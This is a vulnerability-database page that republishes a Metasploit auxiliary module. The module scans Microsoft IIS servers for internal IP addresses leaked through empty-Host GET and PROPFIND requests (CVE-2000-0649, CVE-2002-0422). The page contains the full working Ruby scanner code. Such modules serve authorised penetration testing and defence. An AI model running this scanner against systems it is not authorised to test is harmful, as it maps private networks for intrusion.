Lucene search
K

Microsoft IIS HTTP Internal IP Disclosure

🗓️ 20 Feb 2012 04:44:30Reported by Heather Pilkington, Matthew Dunn - k0pak4Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 161 Views

Collect leaked internal IPs by requesting commonly redirected locations from Microsoft IIS. Vulnerabilities CVE-2000-0649 and CVE-2002-0422. Leaks from PROPFIND method in certain IIS versions

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2000-0649
29 May 201815:50
circl
Circl
CVE-2002-0422
29 May 201815:50
circl
CVE
CVE-2000-0649
3 Aug 200004:00
cve
CVE
CVE-2002-0422
11 Jun 200204:00
cve
Cvelist
CVE-2000-0649
3 Aug 200004:00
cvelist
Cvelist
CVE-2002-0422
11 Jun 200204:00
cvelist
Tenable Nessus
Web Server HTTP Header Internal IP Disclosure
14 Sep 200100:00
nessus
Tenable Nessus
Web Server PROPFIND Method Internal IP Disclosure
18 Mar 200400:00
nessus
Metasploit
HTTP WebDAV Internal IP Scanner
1 Feb 201002:12
metasploit
NVD
CVE-2000-0649
13 Jul 200004:00
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft IIS HTTP Internal IP Disclosure',
        'Description' => %q{
          Collect any leaked internal IPs by requesting commonly redirected locations from IIS.
          CVE-2000-0649 references IIS 5.1 (win2k, XP) and older.  However, in newer servers
          such as IIS 7+, this occurs when the alternateHostName is not set or misconfigured. Also
          collects internal IPs leaked from the PROPFIND method in certain IIS versions.
        },
        'Author' => [
          'Heather Pilkington',
          'Matthew Dunn - k0pak4'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2000-0649'],
          ['CVE', '2002-0422'],
          ['BID', '1499'],
          ['EDB', '20096'],
          ['URL', 'http://web.archive.org/web/20201125004436/https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content'], # iis 4,5,5.1
          ['URL', 'https://support.microsoft.com/en-us/topic/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-http-request-that-does-not-have-a-host-header-or-has-a-null-host-header-is-sent-to-the-server-c493e9bc-dfd3-0d9b-941c-b2d93a957d9e'], # iis 7+
          ['URL', 'https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500']
        ]
      )
    )
  end

  def run_host(target_host)
    uris = ['/', '/images', '/default.htm']
    methods = ['GET', 'PROPFIND']

    uris.each do |uri|
      # Must use send_recv() in order to send a HTTP request without the 'Host' header
      vhost_status = datastore['VHOST'].blank? ? '' : " against #{vhost}"
      vprint_status("#{peer} - Requesting #{uri}#{vhost_status}")

      methods.each do |method|
        c = connect
        request = c.request_cgi(
          'uri' => uri,
          'method' => method,
          'headers' => { 'Host' => '' }
        )
        res = c.send_recv(request, 25)
        intipregex = /(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})/i

        if res.nil?
          print_error("no response for #{target_host}")
        elsif ((res.code > 300) && (res.code < 310))
          vprint_good("Location Header: #{res.headers['Location']}")
          result = res.headers['Location'].scan(intipregex).uniq.flatten

          if !result.empty?
            print_good("Result for #{target_host}#{uri} with method #{method}. Found Internal IP: #{result.first}")
          end
        elsif res.code == 405
          result = res.body.scan(intipregex).uniq.flatten
          if !result.empty?
            print_good("Result for #{target_host}#{uri} with method #{method}. Found Internal IP: #{result.first}")
          end
        end

        next if result.nil?

        report_note({
          host: target_host,
          port: rport,
          proto: 'tcp',
          sname: (ssl ? 'https' : 'http'),
          type: 'iis.ip',
          data: result.first
        })
      end
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Feb 2025 10:30Current
6.4Medium risk
Vulners AI Score6.4
CVSS 22.6
EPSS0.76558
161